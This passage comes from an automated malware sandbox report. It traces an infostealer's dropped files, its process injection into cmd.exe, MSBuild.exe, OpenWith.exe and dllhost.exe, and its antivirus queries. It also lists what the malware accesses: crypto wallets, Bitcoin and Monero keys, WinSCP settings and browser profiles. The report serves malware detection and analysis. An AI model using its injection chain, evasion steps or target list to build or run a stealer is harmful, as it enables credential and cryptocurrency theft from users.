                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_2_000001F664381A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler,17_2_000001F664381A90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 213BBF50000 protect: page read and writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeNtQuerySystemInformation: Direct from: 0x777563E1
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6B7B1000Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 9A6008Jump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeMemory written: C:\Windows\System32\dllhost.exe base: 213BBF50000Jump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeMemory written: C:\Windows\System32\dllhost.exe base: 7FF7D87314E0Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6B7B1000
                      Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 3C9008
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exe "C:\Users\user~1\AppData\Local\Temp\SendBugReportNew.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeProcess created: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exe C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeProcess created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_0040D72E cpuid 7_2_0040D72E
                      Source: C:\Users\user\Desktop\file.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,7_2_00401F9D
                      Source: C:\Windows\System32\OpenWith.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218A1B18 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,17_3_00007DF4218A1B18
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,7_2_00401626
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,7_2_00404FAA
                      Source: C:\Windows\SysWOW64\OpenWith.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: OpenWith.exe, 0000000D.00000002.1394433791.0000000004480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 10.2.V3.exe.c30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5152b57.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.cmd.exe.53fcb57.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.510da8a.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.SendBugReportNew.exe.2ec65ce.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.0.V3.exe.c30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.cmd.exe.53fd757.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.cmd.exe.52e1a8a.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.cmd.exe.53b7a8a.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.cmd.exe.5327757.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.SendBugReportNew.exe.2ec59ce.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.cmd.exe.5326b57.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5153757.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.SendBugReportNew.exe.2e80901.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000020.00000002.1996496863.00000000052DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1322328519.0000000000DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.1720436187.00000000053B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000003.1440127395.000001F666561000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000003.1326989708.0000000002980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000000.1297243134.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.1327837803.0000000000C31000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000003.1440280085.000001F666614000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000003.1740003326.000001F666761000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.1394467847.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.1326750391.0000000003E30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exe, type: DROPPED
                      Source: Yara matchFile source: 32.2.cmd.exe.31c00c8.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.59800c8.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.59800c8.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.MSBuild.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.cmd.exe.31c00c8.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000020.00000002.1996059413.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.3766821762.00000000029D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1687453554.0000000005980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.1997258638.0000000000152000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7596, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tqco, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\cfi, type: DROPPED
                      Source: OpenWith.exe, 00000011.00000003.1511323700.000001F6663D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\Qtum-Electrum\config
                      Source: OpenWith.exe, 00000011.00000003.1497516900.000001F66635D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\com.liberty.jaxx
                      Source: OpenWith.exe, 00000011.00000003.1497516900.000001F66635D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                      Source: OpenWith.exe, 00000011.00000003.1497516900.000001F66635D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\Exodus
                      Source: OpenWith.exe, 00000011.00000003.1497516900.000001F66635D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\Coinomi\Coinomi\wallets
                      Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-QtJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\SecurityJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\y572q81e.defaultJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\startupCacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-releaseJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67Jump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\safebrowsing\google4Jump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\mainJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\safebrowsingJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settingsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs\browser\newtabJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\doomedJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\thumbnailsJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packsJump to behavior
